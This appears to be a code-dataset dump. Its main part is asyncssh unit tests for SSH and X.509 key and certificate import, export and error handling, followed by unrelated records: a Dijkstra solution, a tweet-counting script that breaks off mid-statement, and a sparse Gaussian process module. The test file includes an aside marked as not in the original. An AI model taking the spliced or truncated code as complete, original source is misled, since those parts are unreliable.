self.subTest('Import OpenSSH public'):\n self.import_openssh_public()\n\n with self.subTest('Export OpenSSH public'):\n self.export_openssh_public()\n\n def check_openssh_certificate(self):\n \"\"\"Check OpenSSH certificate format\"\"\"\n\n with self.subTest('Import OpenSSH user certificate'):\n self.import_openssh_certificate(CERT_TYPE_USER, 'usercert')\n\n with self.subTest('Export OpenSSH user certificate'):\n self.export_openssh_certificate(CERT_TYPE_USER, self.usercert)\n\n with self.subTest('Import OpenSSH host certificate'):\n self.import_openssh_certificate(CERT_TYPE_HOST, 'hostcert')\n\n with self.subTest('Export OpenSSH host certificate'):\n self.export_openssh_certificate(CERT_TYPE_HOST, self.hostcert)\n\n def check_rfc4716_public(self):\n \"\"\"Check RFC4716 public key format\"\"\"\n\n with self.subTest('Import RFC4716 public'):\n self.import_rfc4716_public()\n\n with self.subTest('Export RFC4716 public'):\n self.export_rfc4716_public()\n\n def check_rfc4716_certificate(self):\n \"\"\"Check RFC4716 certificate format\"\"\"\n\n with self.subTest('Import RFC4716 user certificate'):\n self.import_rfc4716_certificate(CERT_TYPE_USER, 'usercert')\n\n with self.subTest('Export RFC4716 user certificate'):\n self.export_rfc4716_certificate(CERT_TYPE_USER, self.usercert)\n\n with self.subTest('Import RFC4716 host certificate'):\n self.import_rfc4716_certificate(CERT_TYPE_HOST, 'hostcert')\n\n with self.subTest('Export RFC4716 host certificate'):\n 
self.export_rfc4716_certificate(CERT_TYPE_HOST, self.hostcert)\n\n def check_der_x509_certificate(self):\n \"\"\"Check DER X.509 certificate format\"\"\"\n\n with self.subTest('Import DER X.509 user certificate'):\n self.import_der_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Export DER X.509 user certificate'):\n self.export_der_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Import DER X.509 host certificate'):\n self.import_der_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Export DER X.509 host certificate'):\n self.export_der_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n def check_pem_x509_certificate(self):\n \"\"\"Check PEM X.509 certificate format\"\"\"\n\n with self.subTest('Import PEM X.509 user certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Export PEM X.509 user certificate'):\n self.export_pem_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Import PEM X.509 host certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Export PEM X.509 host certificate'):\n self.export_pem_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Import PEM X.509 trusted user certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_USER, self.userx509,\n trusted=True)\n\n with self.subTest('Import PEM X.509 trusted host certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_HOST, self.hostx509,\n trusted=True)\n\n def check_openssh_x509_certificate(self):\n \"\"\"Check OpenSSH X.509 certificate format\"\"\"\n\n with self.subTest('Import OpenSSH X.509 user certificate'):\n self.import_openssh_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Export OpenSSH X.509 user certificate'):\n self.export_openssh_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Import OpenSSH X.509 host certificate'):\n self.import_openssh_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Export OpenSSH X.509 host certificate'):\n self.export_openssh_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n def check_certificate_options(self):\n \"\"\"Check SSH certificate options\"\"\"\n\n cert = self.privca.generate_user_certificate(\n self.pubkey, 'name', force_command='command',\n source_address=['1.2.3.4'], permit_x11_forwarding=False,\n permit_agent_forwarding=False,\n permit_port_forwarding=False, permit_pty=False,\n permit_user_rc=False, touch_required=False)\n\n cert.write_certificate('cert')\n self.check_certificate(CERT_TYPE_USER, 'openssh')\n\n for valid_after, valid_before in ((0, 1.),\n (datetime.now(), '+1m'),\n ('20160101', '20160102'),\n ('20160101000000', '20160102235959'),\n ('now', '1w2d3h4m5s'),\n ('-52w', '+52w')):\n\n cert = self.privca.generate_host_certificate(\n self.pubkey, 'name', valid_after=valid_after,\n valid_before=valid_before)\n\n cert.write_certificate('cert')\n cert2 = asyncssh.read_certificate('cert')\n self.assertEqual(cert2.public_data, cert.public_data)\n\n def check_certificate_errors(self, cert_type):\n \"\"\"Check general and OpenSSH certificate error cases\"\"\"\n\n with self.subTest('Non-ASCII certificate'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('\\u0080\\n')\n\n with self.subTest('Invalid SSH format'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('xxx\\n')\n\n with self.subTest('Invalid certificate packetization'):\n 
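# a blob too short to hold its length-prefixed fields\n 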
with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(\n b'xxx ' + binascii.b2a_base64(b'\\x00'))\n\n with self.subTest('Invalid certificate algorithm'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(\n b'xxx ' + binascii.b2a_base64(String(b'xxx')))\n\n with self.subTest('Invalid certificate critical option'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={b'xxx': b''})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Ignored certificate extension'):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n extensions={b'xxx': b''})\n self.assertIsNotNone(asyncssh.import_certificate(cert))\n\n with self.subTest('Invalid certificate signature'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n bad_signature=True)\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid characters in certificate key ID'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n key_id=b'\\xff')\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid characters in certificate principal'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, (b'\\xff',))\n asyncssh.import_certificate(cert)\n\n if cert_type == CERT_TYPE_USER:\n with self.subTest('Invalid characters in force-command'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={'force-command':\n String(b'\\xff')})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid characters in source-address'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={'source-address':\n String(b'\\xff')})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid IP network in source-address'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={'source-address':\n String('1.1.1.256')})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid certificate type'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(0, self.pubkey,\n self.privca, ('name',))\n asyncssh.import_certificate(cert)\n\n with self.subTest('Mismatched certificate type'):\n with self.assertRaises(ValueError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',))\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type ^ 3, 'name')\n\n with self.subTest('Certificate not yet valid'):\n with self.assertRaises(ValueError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n valid_after=0xffffffffffffffff)\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type, 'name')\n\n with self.subTest('Certificate expired'):\n with self.assertRaises(ValueError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n valid_before=0)\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type, 'name')\n\n with self.subTest('Certificate principal mismatch'):\n with self.assertRaises(ValueError):\n 
cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',))\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type, 'name2')\n\n for fmt in ('der', 'pem', 'xxx'):\n with self.subTest('Invalid certificate export format', fmt=fmt):\n with self.assertRaises(asyncssh.KeyExportError):\n self.usercert.export_certificate(fmt)\n\n def check_x509_certificate_errors(self):\n \"\"\"Check X.509 certificate error cases\"\"\"\n\n with self.subTest('Invalid DER format'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(b'\\x30\\x00')\n\n with self.subTest('Invalid DER format in certificate list'):\n with self.assertRaises(asyncssh.KeyImportError):\n write_file('certlist', b'\\x30\\x00')\n asyncssh.read_certificate_list('certlist')\n\n with self.subTest('Invalid PEM format'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----')\n\n with self.subTest('Invalid PEM certificate type'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN XXX CERTIFICATE-----\\n'\n '-----END XXX CERTIFICATE-----\\n')\n\n with self.subTest('Missing PEM footer'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN CERTIFICATE-----\\n')\n\n with self.subTest('Invalid PEM Base64'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN CERTIFICATE-----\\n'\n 'X\\n'\n '-----END CERTIFICATE-----\\n')\n\n with self.subTest('Invalid PEM trusted certificate'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(\n '-----BEGIN TRUSTED CERTIFICATE-----\\n'\n 'MA==\\n'\n '-----END TRUSTED CERTIFICATE-----\\n')\n\n with self.subTest('Invalid PEM certificate data'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN CERTIFICATE-----\\n'\n 'XXXX\\n'\n '-----END CERTIFICATE-----\\n')\n\n with self.subTest('Certificate not yet valid'):\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root',\n valid_after=0xfffffffffffffffe)\n\n with self.assertRaises(ValueError):\n self.validate_x509(cert)\n\n with self.subTest('Certificate expired'):\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root', valid_before=1)\n\n with self.assertRaises(ValueError):\n self.validate_x509(cert)\n\n with self.subTest('Certificate principal mismatch'):\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root', principals=['name'])\n\n with self.assertRaises(ValueError):\n self.validate_x509(cert, 'name2')\n\n for fmt in ('rfc4716', 'xxx'):\n with self.subTest('Invalid certificate export format', fmt=fmt):\n with self.assertRaises(asyncssh.KeyExportError):\n self.userx509.export_certificate(fmt)\n\n with self.subTest('Empty certificate chain'):\n with self.assertRaises(asyncssh.KeyImportError):\n decode_ssh_certificate(String('x509v3-ssh-rsa') +\n UInt32(0) + UInt32(0))\n\n def check_x509_certificate_subject(self):\n \"\"\"Check X.509 certificate subject cases\"\"\"\n\n with self.subTest('Missing certificate subject algorithm'):\n with self.assertRaises(asyncssh.KeyImportError):\n import_certificate_subject('xxx')\n\n with self.subTest('Unknown certificate subject algorithm'):\n with self.assertRaises(asyncssh.KeyImportError):\n import_certificate_subject('xxx subject=OU=name')\n\n with self.subTest('Invalid certificate subject'):\n with 
self.assertRaises(asyncssh.KeyImportError):\n import_certificate_subject('x509v3-ssh-rsa xxx')\n\n subject = import_certificate_subject('x509v3-ssh-rsa subject=OU=name')\n self.assertEqual(subject, 'OU=name')\n\n def test_keys(self):\n \"\"\"Check keys and certificates\"\"\"\n\n for alg_name, kwargs in self.generate_args:\n with self.subTest(alg_name=alg_name, **kwargs):\n self.privkey = get_test_key(\n alg_name, comment='comment', **kwargs)\n self.privkey.write_private_key('priv', self.base_format)\n\n self.pubkey = self.privkey.convert_to_public()\n self.pubkey.set_comment('pub_comment')\n\n self.pubkey.write_public_key('pub', self.base_format)\n self.pubkey.write_public_key('sshpub', 'openssh')\n\n self.privca = get_test_key(alg_name, 1, **kwargs)\n self.privca.write_private_key('privca', self.base_format)\n\n self.pubca = self.privca.convert_to_public()\n self.pubca.write_public_key('pubca', self.base_format)\n\n self.usercert = self.privca.generate_user_certificate(\n self.pubkey, 'name', comment='user_comment')\n self.usercert.write_certificate('usercert')\n\n hostcert_sig_alg = self.privca.sig_algorithms[0].decode()\n self.hostcert = self.privca.generate_host_certificate(\n self.pubkey, 'name', sig_alg=hostcert_sig_alg,\n comment='host_comment')\n self.hostcert.write_certificate('hostcert')\n\n for f in ('priv', 'privca'):\n os.chmod(f, 0o600)\n\n self.assertEqual(self.privkey.get_algorithm(), alg_name)\n\n self.assertEqual(self.usercert.get_algorithm(),\n self.default_cert_version)\n\n if self.x509_supported:\n self.rootx509 = self.privca.generate_x509_ca_certificate(\n self.pubca, 'OU=root')\n\n self.rootx509.write_certificate('rootx509')\n\n self.userx509 = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root',\n comment='user_comment')\n\n self.assertEqual(self.userx509.get_algorithm(),\n 'x509v3-' + alg_name)\n\n self.userx509.write_certificate('userx509')\n\n self.hostx509 = self.privca.generate_x509_host_certificate(\n self.pubkey, 'OU=host', 'OU=root',\n comment='host_comment')\n\n self.hostx509.write_certificate('hostx509')\n\n self.otherx509 = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=other', 'OU=root')\n\n self.otherx509.write_certificate('otherx509')\n\n self.check_encode_errors()\n self.check_decode_errors()\n self.check_sshkey_base_errors()\n self.check_sign_and_verify()\n self.check_set_certificate()\n self.check_comment()\n\n if 'pkcs1' in self.private_formats:\n self.check_pkcs1_private()\n\n if 'pkcs1' in self.public_formats:\n self.check_pkcs1_public()\n\n if 'pkcs8' in self.private_formats: # pragma: no branch\n self.check_pkcs8_private()\n\n if 'pkcs8' in self.public_formats: # pragma: no branch\n self.check_pkcs8_public()\n\n self.check_openssh_private()\n self.check_openssh_public()\n self.check_openssh_certificate()\n\n self.check_rfc4716_public()\n self.check_rfc4716_certificate()\n\n self.check_certificate_options()\n\n for cert_type in (CERT_TYPE_USER, CERT_TYPE_HOST):\n self.check_certificate_errors(cert_type)\n\n if self.x509_supported:\n self.check_der_x509_certificate()\n self.check_pem_x509_certificate()\n self.check_openssh_x509_certificate()\n self.check_x509_certificate_errors()\n self.check_x509_certificate_subject()\n\n\nclass TestDSA(_TestPublicKey):\n \"\"\"Test DSA keys\"\"\"\n\n keyclass = 'dsa'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs1', 'pkcs8', 'openssh')\n public_formats = ('pkcs1', 'pkcs8', 'openssh', 'rfc4716')\n default_cert_version = 'ssh-dss-cert-v01@openssh.com'\n 
x509_supported = x509_available\n generate_args = (('ssh-dss', {}),)\n use_openssh = False\n\n\nclass TestRSA(_TestPublicKey):\n \"\"\"Test RSA keys\"\"\"\n\n keyclass = 'rsa'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs1', 'pkcs8', 'openssh')\n public_formats = ('pkcs1', 'pkcs8', 'openssh', 'rfc4716')\n default_cert_version = 'ssh-rsa-cert-v01@openssh.com'\n x509_supported = x509_available\n generate_args = (('ssh-rsa', {'key_size': 1024}),\n ('ssh-rsa', {'key_size': 2048}),\n ('ssh-rsa', {'key_size': 3072}),\n ('ssh-rsa', {'exponent': 3}))\n\n\nclass TestECDSA(_TestPublicKey):\n \"\"\"Test ECDSA keys\"\"\"\n\n keyclass = 'ec'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs1', 'pkcs8', 'openssh')\n public_formats = ('pkcs8', 'openssh', 'rfc4716')\n x509_supported = x509_available\n generate_args = (('ecdsa-sha2-nistp256', {}),\n ('ecdsa-sha2-nistp384', {}),\n ('ecdsa-sha2-nistp521', {}))\n\n @property\n def default_cert_version(self):\n \"\"\"Return default SSH certificate version\"\"\"\n\n return self.privkey.algorithm.decode('ascii') + '-cert-v01@openssh.com'\n\n\n@unittest.skipUnless(ed25519_available, 'ed25519 not available')\nclass TestEd25519(_TestPublicKey):\n \"\"\"Test Ed25519 keys\"\"\"\n\n keyclass = 'ed25519'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs8', 'openssh')\n public_formats = ('pkcs8', 'openssh', 'rfc4716')\n x509_supported = x509_available\n default_cert_version = 'ssh-ed25519-cert-v01@openssh.com'\n generate_args = (('ssh-ed25519', {}),)\n single_cipher = False\n use_openssh = False\n use_openssl = _openssl_supports_pkey\n\n\n@unittest.skipUnless(ed448_available, 'ed448 not available')\nclass TestEd448(_TestPublicKey):\n \"\"\"Test Ed448 keys\"\"\"\n\n keyclass = 'ed448'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs8', 'openssh')\n public_formats = ('pkcs8', 'openssh', 'rfc4716')\n x509_supported = x509_available\n default_cert_version = 'ssh-ed448-cert-v01@openssh.com'\n generate_args = (('ssh-ed448', {}),)\n use_openssh = False\n use_openssl = _openssl_supports_pkey\n\n\n@unittest.skipUnless(sk_available, 'security key support not available')\nclass TestSKECDSA(_TestPublicKey):\n \"\"\"Test U2F ECDSA keys\"\"\"\n\n keyclass = 'sk-ecdsa'\n base_format = 'openssh'\n private_formats = ('openssh',)\n public_formats = ('openssh',)\n generate_args = (('sk-ecdsa-sha2-nistp256@openssh.com', {}),)\n use_openssh = False\n\n def setUp(self):\n \"\"\"Set up ECDSA security key test\"\"\"\n\n super().setUp()\n self.addCleanup(unstub_sk, *stub_sk([1]))\n\n @property\n def default_cert_version(self):\n \"\"\"Return default SSH certificate version\"\"\"\n\n return self.privkey.algorithm.decode('ascii')[:-12] + \\\n '-cert-v01@openssh.com'\n\n\n@unittest.skipUnless(sk_available, 'security key support not available')\n@unittest.skipUnless(ed25519_available, 'ed25519 not available')\nclass TestSKEd25519(_TestPublicKey):\n \"\"\"Test U2F Ed25519 keys\"\"\"\n\n keyclass = 'sk-ed25519'\n base_format = 'openssh'\n private_formats = ('openssh',)\n public_formats = ('openssh',)\n default_cert_version = 'sk-ssh-ed25519-cert-v01@openssh.com'\n generate_args = (('sk-ssh-ed25519@openssh.com', {}),)\n use_openssh = False\n\n def setUp(self):\n \"\"\"Set up Ed25519 security key test\"\"\"\n\n super().setUp()\n self.addCleanup(unstub_sk, *stub_sk([2]))\n\n\ndel _TestPublicKey\n\n\nclass _TestPublicKeyTopLevel(TempDirTestCase):\n \"\"\"Top-level public key module tests\"\"\"\n\n def test_public_key(self):\n \"\"\"Test public key top-level functions\"\"\"\n\n 
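# A hedged aside (not in the original test): the simplest end-to-end use\n        # of the helpers exercised below, mirroring calls this suite already\n        # makes elsewhere (generate -> convert to public -> certify).\n        demo_key = asyncssh.generate_private_key('ssh-rsa')\n        demo_pub = demo_key.convert_to_public()\n        demo_cert = demo_key.generate_user_certificate(demo_pub, 'demo-key-id')\n        self.assertIsNotNone(demo_cert)\n\n        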
self.assertIsNotNone(get_public_key_algs())\n self.assertIsNotNone(get_certificate_algs())\n self.assertEqual(bool(get_x509_certificate_algs()), x509_available)\n\n def test_public_key_algorithm_mismatch(self):\n \"\"\"Test algorithm mismatch in SSH public key\"\"\"\n\n privkey = get_test_key('ssh-rsa')\n keydata = privkey.export_public_key('openssh')\n keydata = b'ssh-dss ' + keydata.split(None, 1)[1]\n\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_public_key(keydata)\n\n write_file('list', keydata)\n\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.read_public_key_list('list')\n\n def test_pad_error(self):\n \"\"\"Test for missing RFC 1423 padding on PBE decrypt\"\"\"\n\n with self.assertRaises(asyncssh.KeyEncryptionError):\n pkcs1_decrypt(b'', b'AES-128-CBC', os.urandom(16), 'x')\n\n def test_ec_explicit(self):\n \"\"\"Test EC certificate with explicit parameters\"\"\"\n\n if _openssl_available: # pragma: no branch\n for curve in ('secp256r1', 'secp384r1', 'secp521r1'):\n with self.subTest('Import EC key with explicit parameters',\n curve=curve):\n run('openssl ecparam -out priv -noout -genkey -name %s '\n '-param_enc explicit' % curve)\n asyncssh.read_private_key('priv')\n\n @unittest.skipIf(not _openssl_available, \"openssl isn't available\")\n @unittest.skipIf(b'secp224r1' not in _openssl_curves,\n \"this openssl doesn't support secp224r1\")\n def test_ec_explicit_unknown(self):\n \"\"\"Import EC key with unknown explicit parameters\"\"\"\n\n run('openssl ecparam -out priv -noout -genkey -name secp224r1 '\n '-param_enc explicit')\n\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.read_private_key('priv')\n\n def test_generate_errors(self):\n \"\"\"Test errors in private key and certificate generation\"\"\"\n\n for alg_name, kwargs in (('xxx', {}),\n ('ssh-dss', {'xxx': 0}),\n ('ssh-rsa', {'xxx': 0}),\n ('ecdsa-sha2-nistp256', {'xxx': 0}),\n ('ssh-ed25519', {'xxx': 0}),\n ('ssh-ed448', {'xxx': 0})):\n with self.subTest(alg_name=alg_name, **kwargs):\n with self.assertRaises(asyncssh.KeyGenerationError):\n asyncssh.generate_private_key(alg_name, **kwargs)\n\n privkey = get_test_key('ssh-rsa')\n pubkey = privkey.convert_to_public()\n privca = get_test_key('ssh-rsa', 1)\n\n with self.assertRaises(asyncssh.KeyGenerationError):\n privca.generate_user_certificate(pubkey, 'name', version=0)\n\n with self.assertRaises(ValueError):\n privca.generate_user_certificate(pubkey, 'name', valid_after=())\n\n with self.assertRaises(ValueError):\n privca.generate_user_certificate(pubkey, 'name', valid_after='xxx')\n\n with self.assertRaises(ValueError):\n privca.generate_user_certificate(pubkey, 'name', valid_after='now',\n valid_before='-1m')\n\n with self.assertRaises(ValueError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user',\n valid_after=())\n\n with self.assertRaises(ValueError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user',\n valid_after='xxx')\n\n with self.assertRaises(ValueError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user',\n valid_after='now',\n valid_before='-1m')\n\n privca.x509_algorithms = None\n\n with self.assertRaises(asyncssh.KeyGenerationError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user')\n\n def test_rsa_encrypt_error(self):\n \"\"\"Test RSA encryption error\"\"\"\n\n privkey = get_test_key('ssh-rsa', 2048)\n pubkey = privkey.convert_to_public()\n\n self.assertIsNone(pubkey.encrypt(os.urandom(256), pubkey.algorithm))\n\n def test_rsa_decrypt_error(self):\n \"\"\"Test RSA 
decryption error\"\"\"\n\n privkey = get_test_key('ssh-rsa', 2048)\n\n self.assertIsNone(privkey.decrypt(b'', privkey.algorithm))\n\n @unittest.skipUnless(x509_available, 'x509 not available')\n def test_x509_certificate_hashes(self):\n \"\"\"Test X.509 certificate hash algorithms\"\"\"\n\n privkey = get_test_key('ssh-rsa')\n pubkey = privkey.convert_to_public()\n\n for hash_alg in ('sha256', 'sha512'):\n cert = privkey.generate_x509_user_certificate(\n pubkey, 'OU=user', hash_alg=hash_alg)\n\n cert.write_certificate('cert', 'pem')\n\n cert2 = asyncssh.read_certificate('cert')\n self.assertEqual(str(cert2.subject), 'OU=user')\n","repo_name":"ronf/asyncssh","sub_path":"tests/test_public_key.py","file_name":"test_public_key.py","file_ext":"py","file_size_in_byte":99405,"program_lang":"python","lang":"en","doc_type":"code","stars":1408,"dataset":"github-code","pt":"6"} +{"seq_id":"3926158","text":"import heapq\nimport sys\nINF = int(1e9)\n\n\ndef dijkstra(st):\n queue = []\n heapq.heappush(queue, (0, st))\n while queue:\n dist, now = heapq.heappop(queue)\n if visited[now]:\n continue\n visited[now] = True\n for now_dist, now_dest in graph[now]:\n if distance[now_dest] < now_dist + dist:\n continue\n dist_update = now_dist + dist\n heapq.heappush(queue, (dist_update, now_dest))\n distance[now_dest] = dist_update\n\n\nvertex, edges = (int(i) for i in sys.stdin.readline().split())\ngraph = [[] for _ in range(vertex + 1)]\nfor _ in range(edges):\n start, dest, dis = (int(i) for i in sys.stdin.readline().split())\n graph[start].append([dis, dest])\n\nanswer = []\ncnt = [[] for _ in range(vertex + 1)]\n# 돌아갈 수 없는 곳 체크\nfor i in range(1, vertex + 1):\n visited = [False] * (vertex + 1)\n for idx, j in enumerate(cnt):\n if i in j:\n visited[idx] = True\n distance = [INF] * (vertex + 1)\n dijkstra(i)\n for idx, j in enumerate(distance):\n if j == INF:\n cnt[i].append(idx)\n answer.append(distance[i])\nif min(answer) == INF:\n print(-1)\nelse:\n print(min(answer))","repo_name":"Winmini/CodingTest","sub_path":"BOJ/1956 - pypy3로 통과.py","file_name":"1956 - pypy3로 통과.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"69863483389","text":"from nltk.tokenize import TweetTokenizer\nfrom datetime import datetime\nfrom helper.variable import sports\nfrom helper.clean_data import convert_time_to_each10s\nfrom streaming.events import Sports\n\n\ndef clean_data_from_tweet(tweets):\n football = 0\n all_sports = 0\n for tweet in tweets:\n sport = \"Unknown\"\n # split text to list of words\n words = TweetTokenizer().tokenize(tweet.text)\n for word in words:\n # get subject sport in text\n if word.lower() in sports:\n sport = word.lower()\n break\n if sport == 'football':\n football += 1\n all_sports += 1\n time = convert_time_to_each10s(datetime.utcnow())\n sports_in_period = Sports(time=time, football=football, all_sports=all_sports)\n print('Send to analyze:')\n return sports_in_period\n\n\ndef count_sports(event, football, sports):\n curr = convert_time_to_each10s(datetime.utcnow())\n # if current == time of event\n if curr == event.time:\n # update last 10 period time\n for i in range(9, 0, -1):\n football[i] = football[i - 1]\n sports[i] = sports[i - 1]\n football[0] = event.football\n sports[0] = event.all_sports\n print('a period = 10 seconds')\n print('last_10_period_football: ', football)\n print('last_10_period_sports: ', sports)\n print('___end___stage___')\n return [football, 
{"seq_id":"43005459158","text":"\"\"\"\nFully Independent Training Conditional (FITC) sparse Gaussian process. See Snelson and Ghahramani, 2006.\n\"\"\"\nimport torch\nfrom sgpr import SGPR\nfrom linalg import stable_cholesky, triangular_solve, stable_divide, LOG_2PI, stable_sqrt\nfrom torch.functional import F\n\n\nclass SGPR_FITC(SGPR):\n    def __init__(self, Xm, Xn, yn, kernel, variance=None):\n        \"\"\"\n        :param Xm: Inducing inputs.\n        :type Xm: torch.tensor [m, d]\n        \"\"\"\n        super(SGPR_FITC, self).__init__(Xm, kernel, variance)\n        self.Xn = Xn\n        self.yn = yn\n\n    def forward(self, Xt, diag=False):\n        Kmm = self.kernel(self.inducing)\n        Kmn = self.kernel(self.inducing, self.Xn)\n        Ktm = self.kernel(Xt, self.inducing)\n        Knn = self.kernel(self.Xn, diag=True)\n        variance = F.softplus(self.free_variance)\n        Lm = stable_cholesky(Kmm)\n        LiUT = triangular_solve(Kmn, Lm)\n        sigma_star = Knn.squeeze() + variance - torch.sum(LiUT ** 2, 0)\n        sigma_star_sqrt_inv = stable_sqrt(stable_divide(1., sigma_star))\n\n        Lmi_Kmn = LiUT\n        sigma_Knm_Lmi = sigma_star_sqrt_inv.reshape(-1, 1) * Lmi_Kmn.t()\n        woodbury_chol = stable_cholesky(\n            torch.eye(self.inducing.size(0), device=Xt.device) + sigma_Knm_Lmi.t() @ sigma_Knm_Lmi)\n\n        Lmi_Kmt = triangular_solve(Ktm.t(), Lm)\n        left = triangular_solve(Lmi_Kmt, woodbury_chol)\n        tmp = sigma_Knm_Lmi.t() @ (sigma_star_sqrt_inv.unsqueeze(-1) * self.yn)\n        right = triangular_solve(tmp, woodbury_chol)\n        mean = left.t() @ right\n\n        if diag:\n            # return only the diagonal of the predictive covariance\n            Ktt_diag = self.kernel(Xt, diag=True)\n            tmp = triangular_solve(Lmi_Kmt, woodbury_chol)\n            var = Ktt_diag - torch.sum(Lmi_Kmt ** 2, dim=0).unsqueeze(-1) + torch.sum(tmp ** 2, dim=0).unsqueeze(-1)\n            return mean, var\n        else:\n            Ktt = self.kernel(Xt, Xt)\n            tmp = triangular_solve(Lmi_Kmt, woodbury_chol)\n            cov = Ktt - Lmi_Kmt.t() @ Lmi_Kmt + tmp.t() @ tmp\n            return mean, cov\n\n    def loss(self):\n        # follows the GPy implementation\n        num_inducing = self.inducing.size(0)\n        num_data = self.yn.size(0)\n\n        variance = F.softplus(self.free_variance)\n        Kmm = self.kernel(self.inducing)\n        Knn = self.kernel(self.Xn, diag=True)\n        Knm = self.kernel(self.Xn, self.inducing)\n        U = Knm\n\n        Lm = stable_cholesky(Kmm)\n        LiUT = triangular_solve(U.t(), Lm)\n\n        sigma_star = Knn.squeeze() + variance - torch.sum(LiUT ** 2, 0)\n        beta = stable_divide(1., sigma_star)\n\n        tmp = LiUT * torch.sqrt(beta)\n        A = tmp @ tmp.t() + torch.eye(num_inducing, device=self.device)\n        LA = stable_cholesky(A)\n\n        URiy = (U.t() * beta) @ self.yn\n        tmp = triangular_solve(URiy, Lm)\n        b = triangular_solve(tmp, LA)\n\n        loss = 0.5 * num_data * LOG_2PI + torch.sum(torch.log(torch.diag(LA))) - 0.5 * torch.sum(\n            torch.log(beta)) + 0.5 * torch.sum((self.yn.t() * torch.sqrt(beta)) ** 2) - 0.5 * torch.sum(b ** 2)\n        return loss\n","repo_name":"weiyadi/dlm_sgp","sub_path":"conjugate/sgpr_fitc.py","file_name":"sgpr_fitc.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"}
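The FITC forward/loss above repeatedly uses the "factor once, solve against the factor" Cholesky pattern rather than ever forming an inverse. A minimal PyTorch sketch of that pattern on a toy SPD matrix (standing in for the module's stable_cholesky/triangular_solve helpers):

import torch

# Solve (K) x = y and get log|K| from a single Cholesky factor,
# the same pattern the FITC loss uses instead of inverting K.
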